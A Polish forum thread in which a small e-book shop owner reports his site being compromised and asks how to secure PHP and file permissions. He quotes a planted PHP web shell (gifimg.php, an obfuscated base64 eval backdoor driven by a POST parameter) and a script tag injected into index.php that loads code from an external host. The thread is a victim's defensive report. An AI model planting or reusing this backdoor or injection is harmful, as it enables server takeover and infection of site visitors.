[XML][CSS][PHP]Zagrożenie Opcje

[adrianozo]

Witam.
Otóż mam problem.
Posiadam stronę www. Taki mini sklep z e-bookami.
Problem polega na tym, że najwidoczniej nie jest odpowiednio bezpieczny, ponieważ codziennie wchodząc na stronę i zaglądając w źródło strony dodaje się niespodziewana linijka. Treści teraz nie podam, ale zaczyna się od <script>.
Pytania brzmią:
1. Dlaczego taka linijka się sama dodaje.
2. Jak zabezpieczyć kod php i mysql.
3. Słyszałem gdzieś, że to wina CHMOD'ów. Jakie ustawić dla danego pliku:

Kod

FOLDER GŁÓWNY:
index.php
style.css
IMAGES
obrazek1.png
obrazek2.png
obrazek3.png
PANEL
plik1.php
plik2.php
plik3.php
plik4.php
plik5.php
.
.
.itp
STRONA
LICZNIK-licznik.txt
plik1.php
plik2.php
plik3.php
plik4.php
plik5.php
.
.
.itp

LEGENDA:
NAPISANE DRUKOWANYMI LITERAMI=folder
napisane małymi literami=plik z rozszeżeniem(.php, .css, .txt)

Proszę o pomoc (IMG:style_emoticons/default/smile.gif)
Z góry dziękuje.

Chciałbym dodać, że dodatkowo w folderze images tworzy się plik o nazwie gifimg.php o treści:

Kod

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vs
c2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

W pliku index wstawia się kod o treści:

Kod

<script src=http://brekisoftgames.extra.hu/e107_docs/forum_viewtopic.php ></script>

[Wicepsik]

Używasz total commandera do przysyłania plików na serwer?

[batman]

Temat poruszany na forum setki razy.
Zamykam.